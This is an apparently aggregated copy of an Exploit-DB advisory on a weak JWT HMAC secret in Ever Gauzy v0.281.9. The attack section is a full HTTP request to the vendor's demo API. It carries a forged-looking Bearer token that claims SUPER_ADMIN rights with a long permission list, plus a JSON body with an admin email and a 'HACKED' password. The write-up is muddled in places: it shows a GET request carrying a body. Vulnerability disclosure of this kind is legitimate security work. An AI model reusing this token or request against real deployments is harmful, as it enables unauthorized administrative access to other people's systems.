6
[webapps] ever gauzy v0.281.9 - JWT weak HMAC secret
source link: https://www.exploit-db.com/exploits/51354
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
ever gauzy v0.281.9 - JWT weak HMAC secret
## Exploit Title: ever gauzy v0.281.9 - JWT weak HMAC secret
## Author: nu11secur1ty
## Date: 04.08.2023
## Vendor: https://gauzy.co/
## Software: https://github.com/ever-co/ever-gauzy/releases/tag/v0.281.9
## Reference: https://portswigger.net/kb/issues/00200903_jwt-weak-hmac-secret
## Description:
It was, detected a JWT signed using a well-known `HMAC secret key`.
The key used which was found was a secret Key.
The user can find a secret key authentication while sending normal
post requests.
After he found the `Authorization: Bearer` key he can use it to authenticate
and he can be sending a very malicious POST request, it depends on the
scenario.
STATUS:
[+]Issue: JWT weak HMAC secret
[+]Severity: High
[+]Exploit:
```GET
GET /api/auth/authenticated HTTP/2
Host: apidemo.gauzy.co
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
Accept: application/json, text/plain, */*
Language: en
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjJjMWViM2ViLTI3ZDEtNGE2Ni05YjEzLTg4ODVhNmFhYWJlMiIsInRlbmFudElkIjoiMTA0YjhiMDQtNmYzNi00YWMzLWFjNWItNTg4MWQyNjJmMWUxIiwiZW1wbG95ZWVJZCI6bnVsbCwicm9sZSI6IlNVUEVSX0FETUlOIiwicGVybWlzc2lvbnMiOlsiQURNSU5fREFTSEJPQVJEX1ZJRVciLCJURUFNX0RBU0hCT0FSRCIsIlBST0pFQ1RfTUFOQUdFTUVOVF9EQVNIQk9BUkQiLCJUSU1FX1RSQUNLSU5HX0RBU0hCT0FSRCIsIkFDQ09VTlRJTkdfREFTSEJPQVJEIiwiSFVNQU5fUkVTT1VSQ0VfREFTSEJPQVJEIiwiT1JHX1BBWU1FTlRfVklFVyIsIk9SR19QQVlNRU5UX0FERF9FRElUIiwiT1JHX0lOQ09NRVNfVklFVyIsIk9SR19JTkNPTUVTX0VESVQiLCJPUkdfRVhQRU5TRVNfVklFVyIsIk9SR19FWFBFTlNFU19FRElUIiwiUFJPRklMRV9FRElUIiwiRU1QTE9ZRUVfRVhQRU5TRVNfVklFVyIsIkVNUExPWUVFX0VYUEVOU0VTX0VESVQiLCJPUkdfUFJPUE9TQUxTX1ZJRVciLCJPUkdfUFJPUE9TQUxTX0VESVQiLCJPUkdfUFJPUE9TQUxfVEVNUExBVEVTX1ZJRVciLCJPUkdfUFJPUE9TQUxfVEVNUExBVEVTX0VESVQiLCJPUkdfVEFTS19BREQiLCJPUkdfVEFTS19WSUVXIiwiT1JHX1RBU0tfRURJVCIsIk9SR19UQVNLX0RFTEVURSIsIk9SR19USU1FX09GRl9WSUVXIiwiT1JHX0VNUExPWUVFU19WSUVXIiwiT1JHX0VNUExPWUVFU19FRElUIiwiT1JHX0NBTkRJREFURVNfVklFVyIsIk9SR19DQU5ESURBVEVTX0VESVQiLCJPUkdfQ0FORElEQVRFU19JTlRFUlZJRVdfRURJVCIsIk9SR19DQU5ESURBVEVTX0lOVEVSVklFV19WSUVXIiwiT1JHX0NBTkRJREFURVNfRE9DVU1FTlRTX1ZJRVciLCJPUkdfQ0FORElEQVRFU19UQVNLX0VESVQiLCJPUkdfQ0FORElEQVRFU19GRUVEQkFDS19FRElUIiwiT1JHX0lOVkVOVE9SWV9QUk9EVUNUX0VESVQiLCJPUkdfSU5WRU5UT1JZX1ZJRVciLCJPUkdfVEFHU19BREQiLCJPUkdfVEFHU19WSUVXIiwiT1JHX1RBR1NfRURJVCIsIk9SR19UQUdTX0RFTEVURSIsIk9SR19VU0VSU19WSUVXIiwiT1JHX1VTRVJTX0VESVQiLCJPUkdfSU5WSVRFX1ZJRVciLCJPUkdfSU5WSVRFX0VESVQiLCJBTExfT1JHX1ZJRVciLCJBTExfT1JHX0VESVQiLCJQT0xJQ1lfVklFVyIsIlBPTElDWV9FRElUIiwiVElNRV9PRkZfRURJVCIsIlJFUVVFU1RfQVBQUk9WQUxfVklFVyIsIlJFUVVFU1RfQVBQUk9WQUxfRURJVCIsIkFQUFJPVkFMU19QT0xJQ1lfVklFVyIsIkFQUFJPVkFMU19QT0xJQ1lfRURJVCIsIkNIQU5HRV9TRUxFQ1RFRF9FTVBMT1lFRSIsIkNIQU5HRV9TRUxFQ1RFRF9DQU5ESURBVEUiLCJDSEFOR0VfU0VMRUNURURfT1JHQU5JWkFUSU9OIiwiQ0hBTkdFX1JPTEVTX1BFUk1JU1NJT05TIiwiQUNDRVNTX1BSSVZBVEVfUFJPSkVDVFMiLCJUSU1FU0hFRVRfRURJVF9USU1FIiwiU1VQRVJfQURNSU5fRURJVCIsIlBVQkxJQ19QQUdFX0VESVQiLCJJTlZPSUNFU19WSUVXIiwiSU5WT0lDRVNfRURJVCIsIkVTVElNQVRFU19WSUVXIiwiRVNUSU1BVEVTX0VESVQiLCJPUkdfQ0FORElEQVRFU19JTlRFUlZJRVdFUlNfRURJVCIsIk9SR19DQU5ESURBVEVTX0lOVEVSVklFV0VSU19WSUVXIiwiVklFV19BTExfRU1BSUxTIiwiVklFV19BTExfRU1BSUxfVEVNUExBVEVTIiwiT1JHX0hFTFBfQ0VOVEVSX0VESVQiLCJWSUVXX1NBTEVTX1BJUEVMSU5FUyIsIkVESVRfU0FMRVNfUElQRUxJTkVTIiwiQ0FOX0FQUFJPVkVfVElNRVNIRUVUIiwiT1JHX1NQUklOVF9WSUVXIiwiT1JHX1NQUklOVF9FRElUIiwiT1JHX0NPTlRBQ1RfRURJVCIsIk9SR19DT05UQUNUX1ZJRVciLCJPUkdfUFJPSkVDVF9BREQiLCJPUkdfUFJPSkVDVF9WSUVXIiwiT1JHX1BST0pFQ1RfRURJVCIsIk9SR19QUk9KRUNUX0RFTEVURSIsIk9SR19URUFNX0FERCIsIk9SR19URUFNX1ZJRVciLCJPUkdfVEVBTV9FRElUIiwiT1JHX1RFQU1fREVMRVRFIiwiT1JHX1RFQU1fSk9JTl9SRVFVRVNUX1ZJRVciLCJPUkdfVEVBTV9KT0lOX1JFUVVFU1RfRURJVCIsIk9SR19DT05UUkFDVF9FRElUIiwiRVZFTlRfVFlQRVNfVklFVyIsIlRJTUVfVFJBQ0tFUiIsIlRFTkFOVF9BRERfRVhJU1RJTkdfVVNFUiIsIklOVEVHUkFUSU9OX1ZJRVciLCJGSUxFX1NUT1JBR0VfVklFVyIsIlBBWU1FTlRfR0FURVdBWV9WSUVXIiwiU01TX0dBVEVXQVlfVklFVyIsIkNVU1RPTV9TTVRQX1ZJRVciLCJJTVBPUlRfRVhQT1JUX1ZJRVciLCJNSUdSQVRFX0dBVVpZX0NMT1VEIiwiT1JHX0pPQl9FTVBMT1lFRV9WSUVXIiwiT1JHX0pPQl9NQVRDSElOR19WSUVXIiwiSU5WRU5UT1JZX0dBTExFUllfQUREIiwiSU5WRU5UT1JZX0dBTExFUllfVklFVyIsIklOVkVOVE9SWV9HQUxMRVJZX0VESVQiLCJJTlZFTlRPUllfR0FMTEVSWV9ERUxFVEUiLCJNRURJQV9HQUxMRVJZX0FERCIsIk1FRElBX0dBTExFUllfVklFVyIsIk1FRElBX0dBTExFUllfRURJVCIsIk1FRElBX0dBTExFUllfREVMRVRFIiwiT1JHX0VRVUlQTUVOVF9WSUVXIiwiT1JHX0VRVUlQTUVOVF9FRElUIiwiT1JHX0VRVUlQTUVOVF9TSEFSSU5HX1ZJRVciLCJPUkdfRVFVSVBNRU5UX1NIQVJJTkdfRURJVCIsIkVRVUlQTUVOVF9NQUtFX1JFUVVFU1QiLCJFUVVJUE1FTlRfQVBQUk9WRV9SRVFVRVNUIiwiT1JHX1BST0RVQ1RfVFlQRVNfVklFVyIsIk9SR19QUk9EVUNUX1RZUEVTX0VESVQiLCJPUkdfUFJPRFVDVF9DQVRFR09SSUVTX1ZJRVciLCJPUkdfUFJPRFVDVF9DQVRFR09SSUVTX0VESVQiLCJWSUVXX0FMTF9BQ0NPVU5USU5HX1RFTVBMQVRFUyIsIlRFTkFOVF9TRVRUSU5HIiwiQUxMT1dfREVMRVRFX1RJTUUiLCJBTExPV19NT0RJRllfVElNRSIsIkFMTE9XX01BTlVBTF9USU1FIiwiREVMRVRFX1NDUkVFTlNIT1RTIl0sImlhdCI6MTY4MDk4MDAzMn0.3zm2CQ0udVj5VCBYgPPD8BzkhQ_5TgVVi91sN7eMKlw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50
Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.gauzy.co
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.gauzy.co/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 76
{
"email":"[email protected]",
"password": "adminrrrrrrrrrrrrrrrrrrrrrHACKED"
}
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/gauzy.co/2023/ever-gauzy-v0.281.9)
## Proof and Exploit:
[href](https://streamable.com/afsmee)
## Time spend:
03:37:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK